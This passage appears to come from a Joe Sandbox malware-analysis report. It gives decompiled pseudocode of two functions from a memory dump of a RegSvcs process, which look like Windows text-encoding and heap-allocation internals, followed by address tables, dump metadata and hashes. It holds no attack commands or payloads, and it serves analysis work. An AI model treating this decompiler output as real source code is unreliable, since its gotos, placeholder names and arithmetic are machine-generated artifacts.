											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x13e6d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x13e6920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x13e6920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x12f1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M012F1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                          0x012f0d2b
                                          0x012f0d2e
                                          0x012f0d32
                                          0x012f0d39
                                          0x012f0d3b
                                          0x012f0d3d
                                          0x012f0d3f
                                          0x012f0d46
                                          0x012f0d4d
                                          0x012f0d54
                                          0x012f0d5b
                                          0x012f0d62
                                          0x012f0d69
                                          0x012f0d70
                                          0x012f0d77
                                          0x012f0d7e
                                          0x012f0d85
                                          0x012f0d88
                                          0x012f0d8b
                                          0x012f0d8e
                                          0x012f0d91
                                          0x012f0d94
                                          0x012f0d97
                                          0x012f0d9a
                                          0x012f0d9d
                                          0x012f0da6
                                          0x012f10e9
                                          0x012f10ee
                                          0x012f0db9
                                          0x012f0db9
                                          0x012f0dbc
                                          0x0134e9c7
                                          0x0134e9ca
                                          0x0134e9cd
                                          0x0134e9d0
                                          0x0134e9dd
                                          0x0134e9dd
                                          0x012f0dec
                                          0x012f0dec
                                          0x012f0dee
                                          0x012f0df3
                                          0x012f0ebf
                                          0x012f0ec0
                                          0x00000000
                                          0x012f0df9
                                          0x012f0df9
                                          0x012f0e1e
                                          0x012f0e21
                                          0x012f0e24
                                          0x012f0e27
                                          0x012f0e2a
                                          0x012f0e2d
                                          0x012f0e30
                                          0x012f0e36
                                          0x012f1040
                                          0x012f1043
                                          0x012f1049
                                          0x012f1049
                                          0x012f0e3c
                                          0x012f0e3f
                                          0x012f1007
                                          0x012f100a
                                          0x012f1010
                                          0x012f1010
                                          0x012f100a
                                          0x012f0e3f
                                          0x012f0e58
                                          0x012f0e5d
                                          0x012f1000
                                          0x012f0e63
                                          0x012f0e63
                                          0x012f0e63
                                          0x012f0e67
                                          0x012f0e69
                                          0x012f0e69
                                          0x012f0e6d
                                          0x012f0e70
                                          0x012f0e74
                                          0x012f0e76
                                          0x012f0e76
                                          0x012f0e7a
                                          0x012f0e7c
                                          0x012f0e7c
                                          0x012f0e83
                                          0x012f0e86
                                          0x012f0e87
                                          0x012f0e89
                                          0x012f0e8b
                                          0x012f0e91
                                          0x012f0e00
                                          0x012f0e03
                                          0x012f0e03
                                          0x012f0e07
                                          0x012f0e0f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0e0f
                                          0x012f0e97
                                          0x012f0e9c
                                          0x012f113e
                                          0x012f1141
                                          0x012f1143
                                          0x012f0eb1
                                          0x012f0eb1
                                          0x012f0eb4
                                          0x012f0eb6
                                          0x012f1110
                                          0x012f1112
                                          0x0134ea25
                                          0x0134ea25
                                          0x012f0ec3
                                          0x012f0ec3
                                          0x012f0ecb
                                          0x012f10fe
                                          0x012f0ed1
                                          0x012f0ed1
                                          0x012f0ed1
                                          0x012f0ed3
                                          0x012f0edb
                                          0x0134ea2d
                                          0x0134ea2f
                                          0x0134ea31
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0134ea37
                                          0x0134ea37
                                          0x0134ea3a
                                          0x0134ea3e
                                          0x0134ea47
                                          0x0134ea4a
                                          0x0134ea4c
                                          0x0134ea4d
                                          0x0134ea4d
                                          0x0134ea4e
                                          0x0134ea4e
                                          0x0134ea51
                                          0x0134ea52
                                          0x0134ea52
                                          0x00000000
                                          0x012f0ee1
                                          0x012f0ee1
                                          0x012f0ee1
                                          0x012f0ee3
                                          0x012f0ee3
                                          0x012f0ee6
                                          0x012f0eec
                                          0x0134ea5b
                                          0x0134ea5d
                                          0x012f0ef6
                                          0x012f0ef8
                                          0x0134ea6f
                                          0x0134ea6f
                                          0x012f0efe
                                          0x012f0efe
                                          0x012f0f03
                                          0x0134ea7b
                                          0x0134ea7d
                                          0x00000000
                                          0x00000000
                                          0x0134ea83
                                          0x0134ea85
                                          0x00000000
                                          0x00000000
                                          0x0134ea8b
                                          0x0134ea91
                                          0x00000000
                                          0x00000000
                                          0x0134ea97
                                          0x0134ea9a
                                          0x0134eaa0
                                          0x0134eaa2
                                          0x0134eaa2
                                          0x0134eaae
                                          0x0134eab3
                                          0x0134eab6
                                          0x0134eabf
                                          0x0134eaca
                                          0x0134eacd
                                          0x0134ead1
                                          0x0134ead1
                                          0x0134eab8
                                          0x0134eab8
                                          0x0134eab8
                                          0x0134ead2
                                          0x0134ead9
                                          0x012f0f0e
                                          0x012f0f15
                                          0x012f0f17
                                          0x012f0f17
                                          0x012f0f1e
                                          0x012f0f23
                                          0x0134eae1
                                          0x0134eae1
                                          0x012f0f38
                                          0x012f0f3a
                                          0x012f0f3a
                                          0x012f0f49
                                          0x012f1108
                                          0x012f1108
                                          0x012f0f5b
                                          0x012f10c7
                                          0x012f10ca
                                          0x012f10cc
                                          0x00000000
                                          0x00000000
                                          0x012f10dc
                                          0x012f10de
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0f61
                                          0x012f0f61
                                          0x012f0f61
                                          0x012f0f67
                                          0x012f0f6b
                                          0x012f111d
                                          0x012f111d
                                          0x012f0f75
                                          0x012f0f77
                                          0x012f0f77
                                          0x012f0f85
                                          0x012f0f8b
                                          0x012f10b9
                                          0x012f10bc
                                          0x0134eae9
                                          0x0134eae9
                                          0x012f0f91
                                          0x012f0f91
                                          0x012f0f91
                                          0x012f0f96
                                          0x012f0f98
                                          0x012f0f9a
                                          0x012f0f9a
                                          0x012f0fa6
                                          0x012f107c
                                          0x012f107f
                                          0x012f108d
                                          0x00000000
                                          0x012f108d
                                          0x012f1081
                                          0x012f1087
                                          0x0134eaf4
                                          0x0134eafa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0134eb00
                                          0x00000000
                                          0x012f0fac
                                          0x012f0fac
                                          0x00000000
                                          0x012f0fac
                                          0x012f0fa6
                                          0x012f0f5b
                                          0x012f0f09
                                          0x012f0f09
                                          0x00000000
                                          0x012f0f09
                                          0x0134ea63
                                          0x00000000
                                          0x0134ea63
                                          0x012f0ef4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0ef4
                                          0x012f0ebc
                                          0x012f0ebc
                                          0x00000000
                                          0x012f0ebc
                                          0x012f0eb6
                                          0x012f1149
                                          0x012f114c
                                          0x012f114d
                                          0x00000000
                                          0x012f114d
                                          0x012f0ea4
                                          0x012f0ea7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0fb7
                                          0x012f0fb7
                                          0x012f0fbc
                                          0x012f0fc9
                                          0x012f0fc9
                                          0x012f0fce
                                          0x012f1020
                                          0x012f1025
                                          0x012f1094
                                          0x012f1094
                                          0x012f1099
                                          0x0134ea04
                                          0x0134ea04
                                          0x0134ea09
                                          0x0134ea1c
                                          0x0134ea0b
                                          0x0134ea0b
                                          0x0134ea0e
                                          0x0134ea14
                                          0x0134ea14
                                          0x0134ea0e
                                          0x0134ea09
                                          0x012f1027
                                          0x012f1027
                                          0x012f1155
                                          0x012f102d
                                          0x012f102d
                                          0x012f102d
                                          0x012f1032
                                          0x0134e9fc
                                          0x0134e9fc
                                          0x012f1032
                                          0x012f1027
                                          0x00000000
                                          0x012f1025
                                          0x012f0fd0
                                          0x0134e9f4
                                          0x00000000
                                          0x0134e9f4
                                          0x012f0fd6
                                          0x012f0fd9
                                          0x012f1059
                                          0x012f1059
                                          0x012f105e
                                          0x0134e9ec
                                          0x012f1064
                                          0x012f1064
                                          0x012f1064
                                          0x012f1069
                                          0x012f10ac
                                          0x012f106b
                                          0x012f106b
                                          0x012f106e
                                          0x012f1074
                                          0x012f1074
                                          0x012f106e
                                          0x012f1069
                                          0x00000000
                                          0x012f105e
                                          0x012f0fdb
                                          0x012f10a4
                                          0x00000000
                                          0x012f10a4
                                          0x012f0fe1
                                          0x012f0fe4
                                          0x00000000
                                          0x00000000
                                          0x012f0fea
                                          0x012f0ff1
                                          0x00000000
                                          0x012f0ff8
                                          0x00000000
                                          0x00000000
                                          0x0134e9e4
                                          0x00000000
                                          0x00000000
                                          0x012f1018
                                          0x00000000
                                          0x00000000
                                          0x012f1051
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0ff1
                                          0x012f0fbe
                                          0x012f0fc3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f0fc3
                                          0x012f0df3
                                          0x0134e9d5
                                          0x0134e9d7
                                          0x012f1128
                                          0x012f1128
                                          0x012f112b
                                          0x012f112d
                                          0x012f1133
                                          0x012f1133
                                          0x00000000
                                          0x012f112d
                                          0x00000000
                                          0x0134e9d7
                                          0x012f0dc2
                                          0x012f10f6
                                          0x012f0dd4
                                          0x012f0dd7
                                          0x012f0dda
                                          0x012f0de8
                                          0x012f0de9
                                          0x012f0de9
                                          0x012f0dda
                                          0x00000000
                                          0x012f0dc2
                                          0x012f0dac
                                          0x012f0dae
                                          0x012f0db3
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83d4e74ab35f972607948d7f7266bca36cec1233cec7b497073bc4117d2bbf90
                                          • Instruction ID: 26aae9bfce3e475a12adc5237b171bec3fd100f8bc39d57ded25505e63c90635
                                          • Opcode Fuzzy Hash: 83d4e74ab35f972607948d7f7266bca36cec1233cec7b497073bc4117d2bbf90
                                          • Instruction Fuzzy Hash: 8ED1B231E2424ACBEB288E9CC5517BDFBB2FB44304F54413DEB42A7286D7789991CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131B236 Relevance: .3, Instructions: 305COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E0131B236(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t94;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t101;
				char _t103;
				signed int _t114;
				signed int _t115;
				signed char* _t118;
				intOrPtr _t119;
				signed int _t120;
				signed char* _t123;
				signed int _t129;
				char* _t132;
				unsigned int _t147;
				signed int _t157;
				unsigned int _t158;
				signed int _t159;
				signed int _t165;
				signed int _t168;
				signed char _t175;
				signed char _t185;
				unsigned int _t197;
				unsigned int _t206;
				unsigned int* _t214;
				signed int _t218;

				_t156 = __edx;
				_v24 = __edx;
				_t218 = __ecx;
				_t3 = _t156 + 0xfff; // 0xfff
				_t210 = 0;
				_v16 = _t3 & 0xfffff000;
				if(E0131B477(__ecx,  &_v16) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x00000002;
					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
						L32:
						__eflags =  *(_t218 + 0x40) & 0x00000080;
						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
							_t210 = E0139CB4F(_t218);
							__eflags = _t210;
							if(_t210 == 0) {
								goto L33;
							}
							__eflags = ( *_t210 & 0x0000ffff) - _t156;
							if(( *_t210 & 0x0000ffff) < _t156) {
								goto L33;
							}
							_t157 = _t210;
							goto L3;
						}
						L33:
						_t157 = 0;
						__eflags = _t210;
						if(_t210 != 0) {
							__eflags =  *(_t218 + 0x4c);
							if( *(_t218 + 0x4c) != 0) {
								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
							}
						}
						goto L3;
					}
					_v12 = _v12 & 0;
					_t158 = __edx + 0x2000;
					_t94 =  *((intOrPtr*)(__ecx + 0x64));
					__eflags = _t158 - _t94;
					if(_t158 > _t94) {
						_t94 = _t158;
					}
					__eflags =  *((char*)(_t218 + 0xda)) - 2;
					if( *((char*)(_t218 + 0xda)) != 2) {
						_t165 = 0;
					} else {
						_t165 =  *(_t218 + 0xd4);
					}
					__eflags = _t165;
					if(_t165 == 0) {
						__eflags = _t94 - 0x3f4000;
						if(_t94 >= 0x3f4000) {
							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
						}
					}
					_t96 = _t94 + 0x0000ffff & 0xffff0000;
					_v8 = _t96;
					__eflags = _t96 - 0xfd0000;
					if(_t96 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t97 = E01320678(_t218, 1);
					_push(_t97);
					_push(0x2000);
					_v28 = _t97;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t168 = E01339660();
					__eflags = _t168;
					if(_t168 < 0) {
						while(1) {
							_t101 = _v8;
							__eflags = _t101 - _t158;
							if(_t101 == _t158) {
								break;
							}
							_t147 = _t101 >> 1;
							_v8 = _t147;
							__eflags = _t147 - _t158;
							if(_t147 < _t158) {
								_v8 = _t158;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t168 = E01339660();
							__eflags = _t168;
							if(_t168 < 0) {
								continue;
							} else {
								_t101 = _v8;
								break;
							}
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
						goto L60;
					} else {
						_t101 = _v8;
						L12:
						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
						_t103 = _v24 + 0x1000;
						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
							_t103 =  *((intOrPtr*)(_t218 + 0x68));
						}
						_push(_v28);
						_v20 = _t103;
						_push(0x1000);
						_push( &_v20);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						_t159 = E01339660();
						__eflags = _t159;
						if(_t159 < 0) {
							L59:
							E0132174B( &_v12,  &_v8, 0x8000);
							L60:
							_t156 = _v24;
							goto L32;
						} else {
							_t114 = E0132138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
							__eflags = _t114;
							if(_t114 == 0) {
								_t159 = 0xc0000017;
							}
							__eflags = _t159;
							if(_t159 < 0) {
								goto L59;
							} else {
								_t115 = E01317D50();
								_t212 = 0x7ffe0380;
								__eflags = _t115;
								if(_t115 != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								__eflags =  *_t118;
								if( *_t118 != 0) {
									_t119 =  *[fs:0x30];
									__eflags =  *(_t119 + 0x240) & 0x00000001;
									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
										E013B138A(0x226, _t218, _v12, _v20, 4);
										__eflags = E01317D50();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E013B1582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t120 = E01317D50();
								_t213 = 0x7ffe038a;
								__eflags = _t120;
								if(_t120 != 0) {
									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t123 = 0x7ffe038a;
								}
								__eflags =  *_t123;
								if( *_t123 != 0) {
									__eflags = E01317D50();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									E013B1582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t129 = E01317D50();
								__eflags = _t129;
								if(_t129 != 0) {
									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t132 = 0x7ffe0388;
								}
								__eflags =  *_t132;
								if( *_t132 != 0) {
									E013AFEC0(0x230, _t218, _v12, _v8);
								}
								__eflags =  *(_t218 + 0x4c);
								_t214 =  *(_v12 + 0x24);
								if( *(_t218 + 0x4c) != 0) {
									_t197 =  *(_t218 + 0x50) ^  *_t214;
									 *_t214 = _t197;
									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
									__eflags = _t197 >> 0x18 - _t175;
									if(__eflags != 0) {
										_push(_t175);
										E013AFA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
									}
								}
								_t157 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				} else {
					_v16 = _v16 >> 3;
					_t157 = E013199BF(__ecx, _t87,  &_v16, 0);
					E0131A830(__ecx, _t157, _v16);
					if( *(_t218 + 0x4c) != 0) {
						_t206 =  *(_t218 + 0x50) ^  *_t157;
						 *_t157 = _t206;
						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
						if(_t206 >> 0x18 != _t185) {
							_push(_t185);
							E013AFA2B(_t157, _t218, _t157, 0, _t218, __eflags);
						}
					}
					L3:
					return _t157;
				}
			}






































                                          0x0131b23f
                                          0x0131b246
                                          0x0131b249
                                          0x0131b24b
                                          0x0131b251
                                          0x0131b258
                                          0x0131b262
                                          0x0131b2b2
                                          0x0131b2b6
                                          0x0131b456
                                          0x0131b456
                                          0x0131b45a
                                          0x01362912
                                          0x01362914
                                          0x01362916
                                          0x00000000
                                          0x00000000
                                          0x0136291f
                                          0x01362921
                                          0x00000000
                                          0x00000000
                                          0x01362927
                                          0x00000000
                                          0x01362927
                                          0x0131b460
                                          0x0131b460
                                          0x0131b462
                                          0x0131b464
                                          0x0136292e
                                          0x01362931
                                          0x0136293f
                                          0x01362945
                                          0x01362945
                                          0x01362931
                                          0x00000000
                                          0x0131b464
                                          0x0131b2bc
                                          0x0131b2bf
                                          0x0131b2c5
                                          0x0131b2c8
                                          0x0131b2ca
                                          0x013627af
                                          0x013627af
                                          0x0131b2d0
                                          0x0131b2d7
                                          0x0131b437
                                          0x0131b2dd
                                          0x0131b2dd
                                          0x0131b2dd
                                          0x0131b2e3
                                          0x0131b2e5
                                          0x0131b43e
                                          0x0131b443
                                          0x013627b6
                                          0x013627b6
                                          0x0131b443
                                          0x0131b2f5
                                          0x0131b2fa
                                          0x0131b2fd
                                          0x0131b2ff
                                          0x0131b46f
                                          0x0131b46f
                                          0x0131b30a
                                          0x0131b30f
                                          0x0131b310
                                          0x0131b315
                                          0x0131b31b
                                          0x0131b31c
                                          0x0131b321
                                          0x0131b322
                                          0x0131b329
                                          0x0131b32b
                                          0x0131b32d
                                          0x013627c2
                                          0x013627c2
                                          0x013627c5
                                          0x013627c7
                                          0x00000000
                                          0x00000000
                                          0x013627c9
                                          0x013627cb
                                          0x013627ce
                                          0x013627d0
                                          0x013627d2
                                          0x013627d2
                                          0x013627d5
                                          0x013627db
                                          0x013627e0
                                          0x013627e1
                                          0x013627e6
                                          0x013627e7
                                          0x013627ee
                                          0x013627f0
                                          0x013627f2
                                          0x00000000
                                          0x013627f4
                                          0x013627f4
                                          0x00000000
                                          0x013627f4
                                          0x013627f2
                                          0x013627f7
                                          0x013627f9
                                          0x00000000
                                          0x00000000
                                          0x013627ff
                                          0x00000000
                                          0x0131b333
                                          0x0131b333
                                          0x0131b336
                                          0x0131b336
                                          0x0131b33c
                                          0x0131b341
                                          0x0131b344
                                          0x0131b44e
                                          0x0131b44e
                                          0x0131b34a
                                          0x0131b34d
                                          0x0131b353
                                          0x0131b358
                                          0x0131b359
                                          0x0131b35e
                                          0x0131b35f
                                          0x0131b366
                                          0x0131b368
                                          0x0131b36a
                                          0x013628f2
                                          0x013628fe
                                          0x01362903
                                          0x01362903
                                          0x00000000
                                          0x0131b370
                                          0x0131b38c
                                          0x0131b391
                                          0x0131b393
                                          0x0136280a
                                          0x0136280a
                                          0x0131b399
                                          0x0131b39b
                                          0x00000000
                                          0x0131b3a1
                                          0x0131b3a1
                                          0x0131b3a6
                                          0x0131b3b0
                                          0x0131b3b2
                                          0x0136281d
                                          0x0131b3b8
                                          0x0131b3b8
                                          0x0131b3b8
                                          0x0131b3ba
                                          0x0131b3bd
                                          0x01362824
                                          0x0136282a
                                          0x01362831
                                          0x01362841
                                          0x0136284b
                                          0x0136284d
                                          0x01362858
                                          0x01362858
                                          0x01362858
                                          0x01362870
                                          0x01362870
                                          0x01362831
                                          0x0131b3c3
                                          0x0131b3c8
                                          0x0131b3d2
                                          0x0131b3d4
                                          0x01362883
                                          0x0131b3da
                                          0x0131b3da
                                          0x0131b3da
                                          0x0131b3dc
                                          0x0131b3df
                                          0x0136288f
                                          0x01362891
                                          0x0136289c
                                          0x0136289c
                                          0x0136289c
                                          0x013628b4
                                          0x013628b4
                                          0x0131b3e5
                                          0x0131b3ea
                                          0x0131b3ec
                                          0x013628c7
                                          0x0131b3f2
                                          0x0131b3f2
                                          0x0131b3f2
                                          0x0131b3f7
                                          0x0131b3fa
                                          0x013628d9
                                          0x013628d9
                                          0x0131b400
                                          0x0131b407
                                          0x0131b40a
                                          0x0131b40f
                                          0x0131b413
                                          0x0131b41f
                                          0x0131b424
                                          0x0131b426
                                          0x013628e3
                                          0x013628e8
                                          0x013628e8
                                          0x0131b426
                                          0x0131b42f
                                          0x00000000
                                          0x0131b42f
                                          0x0131b39b
                                          0x0131b36a
                                          0x0131b264
                                          0x0131b264
                                          0x0131b279
                                          0x0131b27f
                                          0x0131b287
                                          0x0131b28c
                                          0x0131b290
                                          0x0131b29c
                                          0x0131b2a3
                                          0x013627a0
                                          0x013627a5
                                          0x013627a5
                                          0x0131b2a3
                                          0x0131b2a9
                                          0x0131b2b1
                                          0x0131b2b1

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                          • Instruction ID: c147e695703d16a94fbd0ecd85b735833e9a5193f4bcde22813f1d2768bd4a58
                                          • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                          • Instruction Fuzzy Hash: 24B1C331B0060A9FDB19DBA9C890BBFBBF9AF88308F154569E641D7789DB30D901CB50
                                          Uniqueness

